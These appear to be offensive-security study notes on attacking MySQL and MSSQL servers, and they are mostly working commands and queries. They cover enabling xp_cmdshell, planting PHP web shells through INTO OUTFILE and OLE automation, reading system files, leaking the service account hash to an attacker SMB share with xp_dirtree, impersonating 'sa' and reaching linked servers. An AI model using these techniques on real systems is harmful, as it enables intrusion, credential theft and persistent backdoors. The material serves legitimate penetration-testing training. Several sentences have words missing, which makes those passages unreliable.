SQL

and (MSSQL) are management systems that store data in tables, columns, and rows.

Enumeration

By default, MSSQL uses ports TCP/1433 and UDP/1434, and MySQL uses TCP/3306. However, when MSSQL operates in a "hidden" mode, it uses the TCP/2433 port. We can use Nmap's default scripts -sC option to enumerate database services on a target system:

nmap -Pn -sV -sC -p1433 <IP>

Authentication Mechanisms

MSSQL supports two , which means that users can be created in Windows or the SQL Server:

MySQL also supports different , such as username and password, as well as Windows authentication (a plugin is required). In addition, administrators can for many reasons, including compatibility, security, usability, and more. However, depending on which method is implemented, misconfigurations can occur

Misconfigurations

Misconfigured authentication in SQL Server can let us access the service without credentials if anonymous access is enabled, a user without a password is configured, or any user, group, or machine is allowed to access the SQL Server.

Privileges

Depending on the user's privileges, we may be able to perform different actions within a SQL Server, such as:

• Read or change the contents of a database

• Read or change the server configuration

• Execute commands

• Read local files

• Communicate with other databases

• Capture the local system hash

• Impersonate existing users

• Gain access to other networks

Protocol Specific Attacks

Read/Change the Database

mysql -u julio -pPassword123 -h <IP>

sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30

If we are targetting MSSQL from Linux, we can use sqsh as an alternative to sqlcmd:

sqsh -S <IP> -U julio -P 'MyPassword!' -h

Alternatively, we can use the tool from Impacket with the name mssqlclient.py.

mssqlclient.py -p 1433 julio@<IP>

For domain accounts use the full domain, for local accounts use SERVERNAME\\accountname or .\\accountname

sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!' -h

SQL Default Databases

MySQL default system schemas/databases:

• mysql - is the system database that contains tables that store information required by the MySQL server

• information_schema - provides access to database metadata

• performance_schema - is a feature for monitoring MySQL Server execution at a low level

• sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema

MSSQL default system schemas/databases:

• master - keeps the information for an instance of SQL Server.

• msdb - used by SQL Server Agent.

• model - a template database copied for each new database.

• resource - a read-only database that keeps system objects visible in every database on the server in sys schema.

• tempdb - keeps temporary objects for SQL queries.

MySQL useful syntax

(If we use sqlcmd, we will need to use GO after our query to execute the SQL syntax.)

mysql tool:

SHOW DATABASES;
USE htbusers;
SHOW TABLES;
SELECT * FROM users;

MSSQL useful syntax

sqlcmd tool (remember to write GO):

SELECT name FROM master.dbo.sysdatabases
USE htbusers
SELECT table_name FROM htbusers.INFORMATION_SCHEMA.TABLES
SELECT * FROM users

Execute Commands

• The Windows process spawned by xp_cmdshell has the same security rights as the SQL Server service account

• xp_cmdshell operates synchronously. Control is not returned to the caller until the command-shell command is completed

sqlcmd command:

xp_cmdshell 'whoami'
GO

If xp_cmdshell is not enabled, we can enable it, if we have the appropriate privileges, using the following

-- To allow advanced options to be changed.  
EXECUTE sp_configure 'show advanced options', 1
GO

-- To update the currently configured value for advanced options.  
RECONFIGURE
GO  

-- To enable the feature.  
EXECUTE sp_configure 'xp_cmdshell', 1
GO  

-- To update the currently configured value for this feature.  
RECONFIGURE
GO

Write Local Files

SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

secure_file_priv may be set as follows:

• If empty, the variable has no effect, which is not a secure setting.

• If set to the name of a directory, the server limits import and export operations to work only with files in that directory. The directory must exist; the server does not create it.

• If set to NULL, the server disables import and export operations.

show variables like "secure_file_priv";

sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
sp_configure 'Ole Automation Procedures', 1
GO
RECONFIGURE
GO

DECLARE @OLE INT
DECLARE @FileID INT
EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
EXECUTE sp_OADestroy @FileID
EXECUTE sp_OADestroy @OLE
GO

Read Local Files

By default, MSSQL allows file read on any file in the operating system to which the account has read access. We can use the following SQL query:

SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
GO

by default a MySQL installation does not allow arbitrary file read, but if the correct settings are in place and with the appropriate privileges, we can read files using the following methods:

select LOAD_FILE("/etc/passwd");

Capture MSSQL Service Hash

We can also steal the MSSQL service account hash using xp_subdirs or xp_dirtree undocumented stored procedures, which use the SMB protocol to retrieve a list of child directories under a specified parent directory from the file system.

sqlcmd:

EXEC master..xp_dirtree '\\10.10.110.17\share\'
GO

EXEC master..xp_subdirs '\\10.10.110.17\share\'
GO

If the service account has access to our server, we will obtain its hash. We can then attempt to crack the hash or relay it to another host.

Impersonate Existing Users with MSSQL

SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.

Identify Users that We Can Impersonate

SELECT distinct b.name
FROM sys.server_permissions a
INNER JOIN sys.server_principals b
ON a.grantor_principal_id = b.principal_id
WHERE a.permission_name = 'IMPERSONATE'
GO

To get an idea of privilege escalation possibilities, let's verify if our current user has the sysadmin role:

SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
go

As the returned value 0 indicates, we do not have the sysadmin role, but we can impersonate other users.

EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO

We can now execute any command as a sysadmin as the returned value 1 indicates. To revert the operation and return to our previous user, we can use the Transact-SQL statement REVERT.

Communicate with Other Databases with MSSQL

Identify linked Servers in MSSQL

1> SELECT srvname, isremote FROM sysservers
2> GO

1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO